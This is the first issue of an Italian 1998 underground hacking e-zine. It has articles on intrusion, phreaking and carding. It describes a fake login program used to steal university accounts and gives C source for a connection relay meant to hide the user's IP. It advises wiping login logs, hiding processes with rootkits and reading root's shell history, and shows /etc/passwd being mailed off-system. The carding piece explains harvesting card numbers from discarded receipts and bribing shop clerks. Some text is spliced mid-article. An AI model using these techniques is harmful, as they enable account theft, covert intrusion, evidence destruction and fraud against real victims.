Ŀ J$$$$$$$. $$$$$$$$ $$ $$ J$% d$" d$" d$beeee$" .$$eeee .$P .$$""""$$. $$""""" $$" d$" $$ .$P .$P .$$$$$$$*" e$- $$ e$ $$ z$- """"""" ^" ^"" ^" ^"" ^" UTCHERED R0M iNSiDE ٰ o0[NUMER0 1] [ANN0 1] [ERAi0 1998]0o ͻ iNDiCE ͼ 1 iNTR0 > SMa$teR ͹ 1 HACKiNG: HACKiNG L0CALE C0N C0REL SCRiPT > Nefasto 2 HACKiNG: iNTR0DUZi0NE Ai DATAPiPE > bELFaghor 3 HACKiNG: C0ME NASC0NDERSi DENTR0 UN SiSTEMA UNiX.. > pIGpEN 4 HACKiNG: DES > |scacco| 5 HACKiNG: CARDiNG iN iTALiA > sPIRIT 6 HACKiNG: TiPS'N'TRiCKS > DrumFire ͹ 1 PHREAKiNG: PHREAKiNG iN iTALiA > PiGPeN 2 PHREAKiNG: RADi0ASC0LT0 PER VERi ASC0LT0Ni > Vanadio ͹ 1 ViRii: ViR0PEDiA v1.0 I-II PARTE > PFloriK ͹ 1 CRACKiNG: NAG SCREEN CHE PASSi0NE > The_Hawk 2 CRACKiNG: MiNi GUiDA PER SPR0TEGGERE i Gi0CHi.. > Dr_Slump 3 CRACKiNG: CRACK PER GRAND THET AUT0.. > PUCK ͹ 1 MiSC: GUiDA ALLA CRiTT0GRAFiA.. I PARTE > Blinking 2 MiSC: CENNi SULLA MASTERiZZAZi0NE > Hal9000 3 MiSC: 0VERCL0CK > Zen & Hal ͹ 1 SiTi: CRACKiNG NET > Cavallo ͹ . . ͻ iNTR0 ͼ Siamo italiani. Siamo cattivi. Siamo corrotti. Non chiederti perche' e' nato questo magazine, la risposta e' in te. Sarai skazzato come me di sentirti sminuito solo perche' sei italiano.. La scena cambia... Noi vogliamo valorizzare l'Italia nel contesto underground digitale: ecco nascere Butchered From Inside. Attraverso questo magazine cercheremo di aiutare a crescere e migliorare noi e voi, piccoli punti veloci. Butchered From Inside e' strutturato in varie sezioni, ognuna delle quali tratta un'"Arte" differente: hacking, phreaking, viriing, cracking. Non mancheranno inoltre approfondimenti, consigli e recensioni di nuovi siti. Questo primo numero contiene 16 articoli inediti realizzati dai membri di due gruppi hp italiani: Orda Delle BadLands e S0ftProjecT. Siamo solo una piccola parte degli esponenti dell'UnderIta, ovvero dell'insieme della comunita' cyber che vive l'underground digitale del nostro Paese. Dovete aiutarci in questo progetto, mandateci i vostri articoli, riflessioni, info.. Saremmo felici soprattutto di incontrare la partecipazione di altri gruppi italiani. Potete comunicare con noi all'email: bfi98@usa.net Soffermiamoci brevemente sui contenuti di questo primo numero. La sezione dedicata all'hacking affronta alcuni argomenti pratici: i datapipe, i log files dei sistemi UNIX, un semplice modo per guadagnare accessi in loco. Sono inoltre raccolti alcuni trucchi e suggermienti. Un articolo spiega il funzionamento dell'algoritmo di crittazione DES. Si parla infine di carding, ovvero dell'uso e dei metodi per procurarsi numeri di carte di credito. La seconda parte di Butchered From Inside contiene informazioni sul phreaking: un'analisi del phreak in Italia, con alcuni interessanti confronti tra la situazione del nostro Paese e quella degli USA, ed un'introduzione allo scanning delle radiofrequenze. Lo spazio dedicato ai virus e' interamente occupato dalle prime due parti di Viropedia, una guida alla programmazione virale la cui pubblicazione trovera' seguito nel prossimo numero. I crackers ci parlano di come sproteggere i games e in quale modo e' possibile eliminare i nagscreen dei progs. Trovate inoltre le istruzioni per crackare il gioco Grand Thieft Auto. Butchered From Inside si conclude con la prima parte della guida alla crittografia a chiave pubblica, alcuni consigli sulla masterizzazione, un'analisi della tecnica dell'Overclocking e la recensione del sito Cracking Network. Nel prossimo numero speriamo di poter iniziare la pubblicazione di exploit e nostri programmi, insieme agli articoli di chi si fara' avanti. Abbiate pero' presente che Butchered From Inside e' aperiodico, il numero 2 potrebbe essere pubblicato tra 15 giorni o tra due mesi, dipende dalla quantita' di articoli che scriviamo e che ci inviate. Tenete quindi d'occhio il sito per le nuove uscite. Quando avrai iniettato nella tua fibra ottica questa prima dose di Butchered From Inside, non ne potrai piu' fare a meno... SMa$teR ͻ HACKiNG HACKiNG L0CALE C0N C0REL SCRiPT ͼ Tra i tanti modi per ottenere accesso ad un sistema, uno dei piu' semplici ed efficaci e' quello di prenderlo in loco. Nella mia limitata esperienza di hackeraggio, il ****** stato il luogo che mi ha dato maggiori soddisfazioni. Appena entrato come studente, un occhio attento e' bastato a vedere l'ignoranza media dei sistemisti, in particolare quelli del mio dipartimento. Tralasciamo il fatto che non sanno togliere un virus, configurare una rete di Windows NT, si preoccupano quando qualcuno osa guardare qualcosa che inizia per alt. , sono dettagli di scarsa importanza. Il fatto che si adirassero quando giocavo con i miei compagni a Death Match di Quake, mi turbava un poco. Vendetta. Bene, in quel periodo avevo iniziato a dare un'occhiata al COREL 7 e mi aveva particolarmente interessato COREL SCRIPT, un'applicazione che serve a farsi programmini compilabili in .exe. Gli esempi offerti dalla COREL sono interessanti, come il CD-Player, tanto per ricordarne uno. I vantaggi offerti da questo programma sono una facilita' estrema d'utilizzo, la possibilit di creare interfacce grafiche di qualsiasi tipo e una grande scelta di operazioni possibili. Dopo poche ore passate a studiare la sintassi di questo linguaggio, il Nefasto riesce a produrre un programmino del tutto uguale nell'aspetto a quello di posta elettronica del ****. Il mio scopo, per, non era quello di uguagliare in grafica il terminale di posta elettronica di Unix. Mira della mia perfidia era avere un sacco di accounts nel mio dipartimento. Sostanzialmente, l'utente lanciava il programma di e-mail, digitava login e pwd, e poi si faceva gli affari suoi. Invece non era cos. Lanciava il mio programmino e lui, ignaro, digitava log e pwd che venivano registrate in un normalissimo file di testo, poi il prog simulava un'attesa dovuta ad un downtime, peraltro frequenti, e si lanciava il programma vero, gli passava le informazioni necessarie per il login e puff, l'utente si trovava dinnanzi al bel terminale senza accorgersi di nulla. Il passaggio di login e password dal fake al vero non ha creato nessun problema, ho ricreato con facilita' anche l'effetto shadow sulla password. Alla fine della giornata passavo a raccogliere gli accounts. Avendo a disposizione una decina di computer su cui operare, ed essendoci un centinaio di utenti, in quattro giorni di lavoro ho ottenuto una trentina di accounts. Poi pero', a causa della mia nomea, il sistema stato completamente rinnovato, le pwds sono cambiate, il mio lavoro diventato inutile. Vi prometto il listato del programma (ndr: sara' pubblicato nel numero due di BFI.), vorrei eseguirlo di nuovo su altri servers, appena torno dall'esilio e ossidazione del mio computer permettendo. Nefasto ͻ HACKiNG iNTR0DUZi0NE Ai DATAPiPE ͼ Per capire il funzionamento di un datapipe bisogna aver prima chiaro il concetto di pipe: nelle shell un pipe serve per una gestione completa e corretta dell'input e dell'output, e in particolare permette di passare dati da un comando all'altro, consentendo quindi di utilizzare l'output di un programma come input di un altro: un pipe insomma non svolge altro che una funzione di condotto tra due flussi di dati. In Unix e sistemi Unix like il pipe nelle shell e' espresso con il carattere '|'. Facciamo un esempio per chiarire meglio il concetto: supponiamo di volere mandare il nostro file delle password a un nostro amico, utilizzando il mail transfer agent di Linuz, mail, anziche' utilizzare un mailer e fare un file attach; ci bastera' scrivere: $ more /etc/passwd | mail amico@pirla.com | | | | |_ comando per vedere a schermo il contenuto di un file (simile a type | | | del DOS) |_ file che vogliamo vedere con il comando more | | |_ mail transfer agent | |_ indirizzo di posta del nostro amico :) In questo caso ridirigiamo attraverso il pipe l'output di 'more /etc/passwd', ovvero il contenuto del passwd, verso il comando mail che lo utilizzera' come input, in questo caso come corpo del messaggio indirizzato a amico@pirla.com. Chiarito il concetto di pipe, passiamo ora al funzionamento di un datapipe. Innanzitutto bisogna definirlo: un datapipe e' un programma che consente di ridirigere una connessione verso un determinato server. Possiamo schematizzare il tutto come segue: A nostro computer B server che ospita il datapipe C server "vittima", ovvero server su cui la connessione viene dirottata Quindi: 1- A chiama B (a una determinata porta che avrete scelto) 2- B mette in contatto A con C Sul server C siete quindi loggati con l'IP di B. Il datapipe funzia, come visto per i pipe, da condotto, da tramite... vediamo ora come sfruttare questa situazione! :) Per cominciare, di cosa avete bisogno... allora: * una shell (che sia in grado di compilare il codice del datapipe :) * un datapipe (vedete poi! :) ...a questo punto vi chiederete cosa fare... :) beh ora ve lo spiego! :) Per prima cosa uppate il codice del datapipe sul server B via FTP o forse meglio con un copia/incolla + cat via telnet! :) ...un altro metodo sicuro e' farlo via mail...spedite una mail con attach il codice del datapipe alla vostra shell! :) N.B. se uppate via FTP occhio all'xferlog o wu_ftp.log ! :) Ora non dovete fare altro che compilare il codice del datapipe e eseguirlo...:) Solitamente i datapipe richiedo 3 parametri: 1) local port: e' la porta locale, ovvero la porta che utilizzerete per ridirigere la connessione (sul server B) 2) remote host: e' il server su cui volete ridirigire la connessione (server C) 3) remote port: e' la porta (del server C) a cui vi collegherete Vi sono poi datapipe che vi consentono di loggare le connessioni e altre cosette ...ma a noi non importa, anzi non vogliamo che questo accada! :) ...il codice che allego scarica la connessione sul server C e niente altro... ...insomma, no logging! Ora che sapete usare un datapipe, vi chiederete: cosa ce ne facciamo? Semplice, potete utilizzarlo per spoofarvi! Su IRC o su un qualsiasi server che avrete impostato come server C! :) (il remote host!)...e il vostro IP "reale", quello che l'ISP vi assegna, se saprete sfruttare adeguatamente il server B, non verra' loggato da nessuna parte! :) ...sfruttare adeguatamente il server B, vuol dire non lasciare nessuna traccia nell'history file, nell'utmp e wtmp eccetera eccetera... :) Ecco il codice del datapipe da compilare : }---------------------------------> INIZIO <----------------------------------{ #include #include #include #include #include #include #include #include #include #include #undef STRERROR #ifdef STRERROR extern char *sys_errlist[]; extern int sys_nerr; char *undef = "Undefined error"; char *strerror(error) int error; { if (error > sys_nerr) return undef; return sys_errlist[error]; } #endif main(argc, argv) int argc; char **argv; { int lsock, csock, osock; FILE *cfile; char buf[4096]; struct sockaddr_in laddr, caddr, oaddr; int caddrlen = sizeof(caddr); fd_set fdsr, fdse; struct hostent *h; struct servent *s; int nbyt; unsigned long a; unsigned short oport; if (argc != 4) { fprintf(stderr,"Usage: %s localport remoteport remotehost\n",argv[0]); return 30; } a = inet_addr(argv[3]); if (!(h = gethostbyname(argv[3])) && !(h = gethostbyaddr(&a, 4, AF_INET))) { perror(argv[3]); return 25; } oport = atol(argv[2]); laddr.sin_port = htons((unsigned short)(atol(argv[1]))); if ((lsock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { perror("socket"); return 20; } laddr.sin_family = htons(AF_INET); laddr.sin_addr.s_addr = htonl(0); if (bind(lsock, &laddr, sizeof(laddr))) { perror("bind"); return 20; } if (listen(lsock, 1)) { perror("listen"); return 20; } if ((nbyt = fork()) == -1) { perror("fork"); return 20; } if (nbyt > 0) return 0; setsid(); while ((csock = accept(lsock, &caddr, &caddrlen)) != -1) { cfile = fdopen(csock,"r+"); if ((nbyt = fork()) == -1) { fprintf(cfile, "500 fork: %s\n", strerror(errno)); shutdown(csock,2); fclose(cfile); continue; } if (nbyt == 0) goto gotsock; fclose(cfile); while (waitpid(-1, NULL, WNOHANG) > 0); } return 20; gotsock: if ((osock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) { fprintf(cfile, "500 socket: %s\n", strerror(errno)); goto quit1; } oaddr.sin_family = h->h_addrtype; oaddr.sin_port = htons(oport); memcpy(&oaddr.sin_addr, h->h_addr, h->h_length); if (connect(osock, &oaddr, sizeof(oaddr))) { fprintf(cfile, "500 connect: %s\n", strerror(errno)); goto quit1; } while (1) { FD_ZERO(&fdsr); FD_ZERO(&fdse); FD_SET(csock,&fdsr); FD_SET(csock,&fdse); FD_SET(osock,&fdsr); FD_SET(osock,&fdse); if (select(20, &fdsr, NULL, &fdse, NULL) == -1) { fprintf(cfile, "500 select: %s\n", strerror(errno)); goto quit2; } if (FD_ISSET(csock,&fdsr) || FD_ISSET(csock,&fdse)) { if ((nbyt = read(csock,buf,4096)) <= 0) goto quit2; if ((write(osock,buf,nbyt)) <= 0) goto quit2; } else if (FD_ISSET(osock,&fdsr) || FD_ISSET(osock,&fdse)) { if ((nbyt = read(osock,buf,4096)) <= 0) goto quit2; if ((write(csock,buf,nbyt)) <= 0) goto quit2; } } quit2: shutdown(osock,2); close(osock); quit1: fflush(cfile); shutdown(csock,2); quit0: fclose(cfile); return 0; } }*---------------------------------> FINE <----------------------------------{ Per concludere, un paio di note: 1) ricordatevi che il processo del datapipe puo' esser visto dal system administrator con un semplice ps -ax; per ovviare a questo problema potete o utilizzare le tecniche esposte nell'articolo di PiGPeN73 "Come nascondersi nei sistemi unix" o forse meglio ancora in aggiunta a queste tecniche, scrivere uno script o un programmino che se chiamato con dei parametri, che solo voi saprete, sara' in grado lanciare il datapipe! :) ...e al ps -ax il sysadm vedra' solo il vostro prg anziche' il datapipe! :) se poi rinominate il vostro prg con qualche nome del tipo xtern probabilemente il sysadm non se ne accorgera' nemmeno! :) 2) mettete il datapipe in una directory sperduta, meglio se di un altro utente (fate voi! :) 3) se utilizzate il datapipe verso piu' server ricordatevi di killare i processi che non vi servono piu' (solitamente con kill -HUP )... ...avrete piu' possibilita' di non essere sgamati! :) In alternativa a tutte queste pallose note potete utilizzare il rootkit (non per tutti gli os esiste) per nascondere il processo ! :) Alla prossima... :) _EOF_ bELFaghor Nocturnus Daem0n ͻ HACKiNG C0ME NASC0NDERSi DENTR0 UN SiSTEMA UNiXͼ E ViVERE ELiCi E CONTENTi Autore: PiGPeN Consumo: 1 Te' Guizza alla pesca 1 confezione di pistacchi 1 coca-cola 1 uovo kinder (con un fottutissimo gnomo come sorpresa, tra l'altro ne avevo gia' uno uguale :( Musica ascoltata: Tampa Florida 12/19/73 (Grateful Dead) Reckoning (Grateful Dead) Bene questo articolo ho deciso di scriverlo per rendersi conto di quanti log ci sono all'interno di un sistema unix e come molte volte e' difficile controllarli tutti (anche da parte dell'amministratore). Cominciamo da quelli piu' odiati: utmp wtmp lastlog Questi tre file sono ben conosciuti da chi si occupa di hacking per il semplice fatto che all'interno di essi vengono scritti l'ora, il giorno, la porta da cui e' venuta la connessione e l'ip. Esempio: last PiGPeN PiGPeN ftp localhost Mon Dec 22 18:09 - 18:09 (00:00) PiGPeN ttyp1 porcile.net Mon Dec 22 18:05 still logged in PiGPeN ttyp3 pigland.com Mon Dec 22 15:41 - 15:47 (00:06) PiGPeN tty1 Mon Dec 22 14:57 - down (00:31) PiGPeN tty1 Mon Dec 22 14:49 - down (00:07) PiGPeN tty2 Mon Dec 22 14:36 - down (00:11) Una volta, soprattutto per le versioni come il SunOs, era possibile modificare questi file da parte di ogni utente, ora invece e' richiesto l'accesso come root, cio' vuol dire che molto spesso si fa hacking senza essere sicuri al 100% di poter coprire le tracce. In questi casi, conviene sempre telnettarsi in giro e poi entrarci in modo da coprire il proprio ip. Una volta entrato nel sistema, tenta di utilizzare qualche exploit per avere accesso root, e poi utilizza un programma come zap per rimuovere l'utente dai file di log. NON MODIFICARE uno di questi file con un editor, altrimenti lo incasini per bene, usa un programma apposito! I programmi come lo zap non coprono tuttavia le tracce completamente, infatti mentre non siete visibili con comandi come who, i vostri processi possono essere notati da parte del root. Infatti con un semplice "ps" l'amministratore si puo' accorgere della vostra presenza. Per evitare che questo avvenga ci sono in giro molti rootkit che modificano tale comando non visualizzando processi indesiderati. Se non riuscite a coprire le tracce x mancanza dell'accesso root telnettatevi dalla shell che state usando con lo stesso login, in modo che quando l'utente si collega non veda scritto il vostro ip, ma localhost e quindi non si insospettisca piu' di tanto. Comunque l'user puo' risalire all'ip usando il comando "last nomeutente". sulog Questo file logga l'utilizzo del comando "su" che viene usato dagli utenti per prendere i privilegi come root. Molti hackers lo evitano, io ritengo che "su" sia un buon modo per cambiare utente e rimanere nascosto dal comando "who", oltre a non essere loggato nei files precedenti, con il nuovo utente. Infatti sulog e' un file costituito soltanto da chi e' passato a root e non logga quindi se si passa da un user all'altro. xferlog questo figlio di puttana logga qualsiasi trasferimento che avviene via ftp, ecco un esempio: Mon Dec 22 18:09:30 1997 1 localhost 753 /etc/passwd b _ o r PiGPeN ftp 0 * La cosa migliore e' evitarlo facendo un cat del file che vi interessa via telnet, oppure spedendovi i file ad un indirizzo. Domande e Risposte: Come posso fare un upload senza essere loggato? Ci sono vari modi: 1) Spedisci il file all'utente e aspetti che arriva 2) Usi il copia ed incolla di win per esempio in questo modo: cat > zap < N.B.: L'ordine delle informazioni puo' variare, ma a noi interessano solo alcune di esse. Cominciamo ad esaminare un po' piu' da vicino le informazioni, guardando come appare uno scontrino classico (ovviamente inventato): 04 - S.I. Hackers' Shop Hackers' Town TERM-ID: 04792461 DATA: 25/12/97 00:01 N. TRANS: 000069 RIFERIMENTO: 00000069 4536884583455673 9909 AUT. 34673 CAUS: 547 ACQUISTO CARTA CREDITO IMPORTO L.: 69.666 FIRMA CLIENTE: ...................... TRANSAZIONE ESEGUITA Bene. I dati che ci interessano non sono poi molti, ed in particolare il tipo di CC utilizzata, il numero di CC + expiry date e la causale. Se e' possibile, sarebbe anche utile interpretare la firma del cliente, ma e' facoltativo... Per prima cosa bisogna segnarsi il tipo di CC, sapendo che ad esempio S.I. e' CartaSI e VISA, AMEXCO e' AMERICAN EXPRESS e MC e' MASTERCARD. Quindi e' il turno del numero di CC (la vera cosa utile, quanto sono stupidi a segnare il numero sullo scontrino), che e' nel formato ################ yymm, dove le prime 4 cifre sono il codice della banca che ha emesso la carta, le successive 12 il numero vero e proprio (quindi i primi 16 numeri sono il numero completo), mentre yymm e' la data di scandenza della carta nel formato anno/mese. Infine la causale, un numero di tre cifre, indica ancora il tipo di carta (quindi non e' strettamente necessario, dato che gia' lo possediamo); comunque ad esempio 875 indica CartaSI/VISA. Se e' possibile, interpretate la firma del cliente, puo' sempre essere utile sapere a chi addebitiamo i nostri piccoli acquisti... Qui entra quindi in gioco una delle attivita' piu' vecchie praticate dagli hackers di tutto il mondo, e cioe' il trashing (il ricercare informazioni nella spazzatura dei posti interessanti): scavando fra i cestini dei negozi o seguendo i clienti e' possibile reperire questi scontrini, che sono la vera miniera d'oro di chi pratica il carding in italia. E' possibile, anzi consigliabile, corrompere un amico che lavora come commesso in un negozio per avere accesso ad un vasto campionario di numeri e scontrini... Ora che abbiamo un numero (o piu') di CC, il tipo e possibilmente il nome del proprietario, come utilizzarlo? Da questo punto in poi si corrono i rischi maggiori, quindi state bene attenti all'utilizzo che fate delle vostre scoperte... ...ma di questo parleremo la prossima volta!! sPIRIT ͻ HACKiNG TiPS 'N' TRiCKS ͼ 1 Premessa 2 Macchine SUN 3 File LOG 4 Truchhetti permessi directory /root. Salve. Premessa: Io non sono un grande hacker, anzi, credo proprio di non essere nemmeno un hacker. Ho scritto questo articoletto perche' pensavo che potesse tornare utile, alle persone che hackano, visto che in giro e sui manuali che si reperiscono comunemente nella rete, queste cose non si trovano scritte. Quindi, se pensate che questo testo sia utile, vi ringrazio, altrimenti se pensate che non sia interessante, vi prego non me ne fate una colpa! :(( Macchine SUN: Ho constatato di persona che alcuni trucchetti usati di solito come backdoor, (SUID SHELL, utente con UID e GID a 0) non funzionano su macchine SUN 5.5.1 Per cui se vi ritrovate li' sopra, o avete un compilatore, oppure sono cazzi amari. Quindi se vi ritrovate in questa situazione, non state neppure a perdere tempo per cercare di usare una delle tecniche descritte sopra. Tanto non fungono. (poi se fungono me lo dite ;-PPP File di LOG: Allora, spesso e volentieri su tutti i manualetti di UNIX Hacking si legge che i file di log da togliere per non essere beccati sono di solito 3: utmp wtmp lastlog Secondo me, oltre a questi file ne andrebbe tolto un terzo: il file "messages". Il file messages non e' altro che un file dove vengono salvati tutti i messaggi che i programmi che stanno girando in locale mandano al kernel, quindi programmi come (ftp, telnet, sendmail, pop3, su, etc..) scriveranno nel file messages tutto quello che basta per essere beccati. Esempio: HaCk:~# telnet ppp.cazzone.it "stronzatine varie..." Linux 2.0.30 (ppp.cazzone.it) ttsy0 Login: Ecco a questo punto io mi sono connesso con "ppp.cazzone.it". Nel file messages del server cazzone apparira la scritta seguente, oltre ovviamente alle altre: Feb 2 12:12:00 ppp in.telnetd[97]: connect from Quindi questo significa che anche se io entro tolgo i 3 file detti precedentemente, ma non provvedo anche a nascondermi nel file messages, succedera' che il mio IP e la data della connessione che ho effettuato saranno ben visibili all'amministratore, con conseguente inculamento a saltelli senza vasellina. Trucchetti dei permessi di /root: Allora, adesso sveliamo qualche trucchetto che potra' essere utile quando state facendo hacking. Questo piccolo trucco che permette di vedere il file .bash_history del root sfruttando una piccola anomalia dei permessi della directory root. Infatti il contentuo della suddetta directory la maggior parte delle volte non e' visibile dall'esterno, poiche' i suoi permessi sono settati di solito come lettura, scrittura ed esecuzione solo da parte del root. Pero' se voi una volta loggati nel sistema fate un "cd /root" vi ritroverete all'interno della directory root. A questo punto fate un "cat < /etc/passwd" e guardate la shell di lavoro del root. Se la shell e' "/bin/bash" allora siamo a cavallo, altrimenti lasciate perdere tutto. Infatti, come dovreste sapere, la bash crea un file chiamato .bash_history che registra tutti i comandi che vengono impartiti alla shell da parte di qualsiasi utente. Ogni utente avra' questo file nella propria home dir. Quindi se vi posizionate nella dir dell'utente root e fate un "cat .bash_history | more", come per magia vi apparira' il file .bash_history dove voi potrete vedere tutti i comandi che il root ha digitato. In alternativa potete anche scaricarvelo dall'ftp facendo "cd root" e "get .bash_history" e guardarvelo comodamente a casa. Questo trucchetto e' bellissimo se volete sapere cosa fa il root quando si collega, per vedere quali programmi installa, quali file copia nella sua home dir, quali utenti aggiunge, se fa copie di file importanti i altri posti su disco, insomma puo' davvero essere utile, anche perche' non solo possiamo vedere e prendere il file .bash_history, ma tutti i file che sono all'interno della directory /root. Ovviamente devono essere "-------r-" altrimenti non gli si va in tasca. Ok, anche oggi ho concluso. Ci vediamo la prossima volta che avro' qualche trucchettino fresco fresco!! DrumFire ͻ PHREAKiNG PHREAKiNG iN iTALiA ͼ Autore: PiGPeN Consumo: 1 Sprite da 1.5 L 4 pacchetti di cracker di marca sconosciuta Musica: Night Calls - Joe Cocker Legend - Lynyrd Skynyrd (in particolare When You Got Good Friends) Saluti: Drow Emperor, Quadra, foxtwo e tutti i members dell'A&A oltre che a tutto Soft Project Dedicato a: LeLe (il mio vicino di banco) ATTENZIONE: Questo articolo lo scrivo soltanto per scopi informativi non mi ritengo responsabile di gente che sradica le cabine telefoniche, si mette a provare numeri a caso, ne' sono responsabile della vostra bolletta quindi non incazzatevi con me. Il motivo di questo articolo e' dovuto al fatto che c'e' troppa confusione sul phreaking in Italia, e spero con questo breve spazio di fare un po' di chiarezza. Quello che scrivo si riferisce in gran parte all'AT&T, facendo pero' esplicito riferimento alla Telecom, giusto per far notare la piccola differenza. Comincio con il dire che il phreaking in Italia oggi e' molto piu' difficile di quanto lo sia in America e questo tuttavia non e' un aspetto positivo, per il fatto che la Telecom non ha mosso un dito o quasi per le frodi telefoniche, ma e' stata l'At&T ad imporre certe norme perche' era stufa di vedersi frodata dall'Italia. A parte questo la cosa piu' ironica e' che in Italia siamo molto indietro, ma sembra come che la Telecom si basi sulle esperienze delle grandi compagnie e quindi non c'e' un rapporto tra mancanza di tecnologia e aumento delle frodi. Ok a parte questo in Italia ci sono troppe intercettazioni anche senza motivi e scusatemi, ma mi sembra di essere in una dittatura altro che democrazia del cazzo. Vi sara' capitato di sentir parlare di box di ogni colore, ma probabilmente soltanto per le compagnie americane, infatti sono pochi quelli che funzionano da altre parti. BLUE BOX Il blue box in realta' era nato da una scoperta fatta da un tecnico di trasmissioni radio il cui nome e' John Draper. Egli aveva notato che attraverso un fischietto trovato in una scatola di cereali era possibile fare chiamate senza pagare niente. Ok molti di voi possono pensare che egli si sia fatto una canna e poi, preso dalle allucinazioni, si sia messo a fischiare sulla cornetta, in realta' lo pensavo anch'io, ma non e' cosi'. Infatti egli si era accorto che quel fischietto emulava una frequenza di 2600hz che guarda caso era proprio quella che in gergo telefonico viene chiamata TRUNK CODE o semplicemente TRUNK. Ben presto il suo nome fu associato alla scatola di cereali e venne chiamato CAPITAN CRUNCH. Ci tenevo a fare questa premessa, perche' considero Draper uno dei migliori hacker (oltre al primo phreaker) che ci sia mai stato. Egli e' stato arrestato un paio di volte e, per non essere trattato come una ragazza dai detenuti, ha confessato di aver svelato molti dei segreti che lui conosceva a quei criminali, e oggi egli teme che gran parte di questi siano dietro alle piu' grosse organizzazioni mafiose. Come se non bastasse Draper, che ha fondato un ditta che si occupa della creazione di pagine web, riceve continuamente visite da parte dell'fbi la quale gli sequestra tutto bloccando il suo lavoro per mesi e facendogli perdere un sacco di clienti, questo solo per controlli ... Non intendo spiegare il funzionamento del blue box, anche perche' c'e' tanto materiale in giro, quello che invece voglio dire e' che non e' piu' possibile utilizzarlo nemmeno qui in Italia. Tutto questo lo dobbiamo al fatto che la Telecom (sempre grazie all'At&t), ha introdotto quello che si chiama Electronic Switching System e che attraverso il CCIS filtra il trunk non permettendo quindi il suo passaggio. Attenzione pero' cambiare l'intera rete telefonica non e' una cosa che si fa in un giorno, ecco perche' probabilmente in alcune parti d'Italia il blue box e' ancora possibile. Quello che poi non mi convince molto e' che in realta' non so come si comporta il CCIS ad altri TRUNK e quindi forse il blue boxing verso paesi del terzo mondo si puo' fare. Ecco i trunk presi da un file: ---------------------------------- FOR CALLING VIA: FREQUENCIES: ---------------------------------- ALGERIA 2000 Hz ARGENTINA 3825 Hz AUSTRALIA 600& 750 Hz (SEPERATE) AUSTRIA 2280 Hz BAHAMAS 2600 Hz BANGLADESH 3825 Hz BRAZIL 3825 Hz BURUNDI 3825 Hz CAMEROON 3825 Hz CANADA 2600 Hz CHILE 3825 Hz CUBA 2100/3825 Hz CYPRUS 3825 Hz CZECHOSLOVAKIA 2280 Hz DENMARK 3000/3825 Hz DOMINICAN REP. 2600 Hz FIJI 3825 Hz FRANCE 2280/3850 Hz GHANA 3825 Hz HUNGARY 2280/3825 Hz INDIA 2400 Hz IRAQ 3825 Hz (ONLY, WHEN YOU FIND A NUMBER AFTER THE GULF-WAR IN 1991 - HAHA!) IRELAND 2040/2400 Hz COMPOUND 2280 Hz ISRAEL 3850 Hz ITALY 2040/2400 Hz COMPOUND & SEPERATE che si basano sull'utilizzo dell'ESS e di event JAMAICA 2600 Hz JORDAN 3825 Hz KENIA 2040/2400 Hz KOREA 3825 Hz LIBERIA 3825 Hz LUXEMBOURG 3825 Hz MADAGASCAR 2280 Hz MOROCCO 2280 Hz MOZAMBIQUE 2400 Hz 500/ 20 Hz 1625 Hz 3350 Hz 3825 Hz NIPPON 2600 Hz NORWAY 2400 Hz NEW ZEALAND 600/ 750 Hz 2280 Hz OMAN 3825 Hz PERU SOME DIFFERENT FREQUENCIES! PHILIPINES 3825 Hz OLD: 2600 Hz POLAND 2280 Hz 3825 Hz 500/ 20 Hz 2100 Hz PORTUGAL 3825 Hz ROMANA 3825 Hz OR 2280 Hz SOUTH AFRICA 600/ 750 Hz SEPERATE 2280 Hz SPAIN 2500 Hz SURINAM 3825 Hz SWEDEN 2400 Hz SWITZERLAND 3000 Hz SYRIA 3825 Hz TANZANIA 3825 Hz THAILAND 2400 Hz UGANDA 2040/2400 Hz UNITED KINGDOM 600/ 750 Hz SEPERATE 2280 HZ USA 2600 Hz USSR 1200/1600 Hz SEPERATE & COMPOUND 2600 Hz YUGOSLAVIA 2280 Hz ZAMBIA 3825 Hz RED BOX Bene questo non e' mai stato possibile per il semplice fatto che esso consiste nell'emulare i toni delle monetine per i telefoni pubblici, ma le nostre linee sono ancora ad impulsi, questo e' il tipico esempio di come la Telecom ha evitato una frode non introducendo innovazioni. BLACK BOX Questo box permetteva a colui che vi chiama di non pagare la telefonata, in teoria, prima dell'ESS si poteva utilizzare, ma non ho mai sentito nessuno che ne ha fatto uso, probabilmente in Italia ci sono poche persone che si interessano alla bolletta degli amici ;) Gli altri box sono meno importanti e molte volte si basano sulla fusione di altri, quindi non sto qui a parlarne. COSA C'E' DA TEMERE IN ITALIA? Ok spero che dedichiate qualche minuto a riflettere su quello che vi diro'. In America per alcune citta' sono state utilizzate alcune utility anti-frode che si basano sull'utilizzo dell'ESS e di eventuali device come i DMS, per esempio una telefonata puo' essere tracciata in 55 sec, mentre per una cifra prima ci impiegava sui 33-35 sec. A parte questo c'e' un problema piu' grave e cioe' il monitoraggio. Per esempio l'At&t tiene delle black list di utenti che fanno troppe chiamate ai numeri verdi e da quello che so, non mi sembrano poi tanto eccessive. Una volta che si e' iscritti in queste black list e' possibile che venga fatto il "tapping" della linea: cio' vuol dire che invece di parlare in due, c'e' anche un altro che ascolta, o meglio c'e' un registratore che giace sulla linea. Molti dicono che e' possibile controllare attraverso il voltaggio se e' a 48 V tutto ok, altrimenti se ci sono troppe variazioni siete loggati; questo e' vero solo in parte, in quanto le nuove tecniche non sono rilevabili in questo modo. A parte questo puo' essere fatto un monitoraggio anche sui toni e se qualcuno emula dei toni diversi da quelli emessi dal normale tastierino del telefono, o quelli di funzione tipo il kp e l'st (leggi qualche doc sul bluebox per saperne di piu') viene immediatamente scritto su una lista controllata periodicamente dalle autorita' competenti. Inoltre ci sono alcuni algoritmi scritti in CHILL che si comportano piuttosto duramente nei confronti di chi fa lo scanning dei numeri e i piu' avanzati si accorgono pure della modalita' random. Probabilmente questo software non viene fatto girare in Italia, ma comunque non si sa mai, visto come viene loggato un italiano !!! Ah comunque non c'e' una normativa che vieta lo scanning quindi non so come lo interpreterebbe un giudice, a parte che non so nemmeno come si comporterebbe con un hacker! Vorrei chiarire inoltre perche' con il blue box non era possibile stabilire da dove veniva la chiamata, il motivo e' dovuto al fatto che la seconda chiamata e cioe' quella frodata non poteva essere interpretata dall'AMA (Automatic Machine Accounting) perche' al programma risultava presente gia' una connessione su quella linea e cioe' quella probabilmente fatta al numero verde. Questo bug, che in realta' non si puo' chiamare cosi', e' di difficile correzione (io penso perche' questo e' uno dei modi per stabilire se una linea e' occupata o meno, ma non so se poi se viene usato per questo), 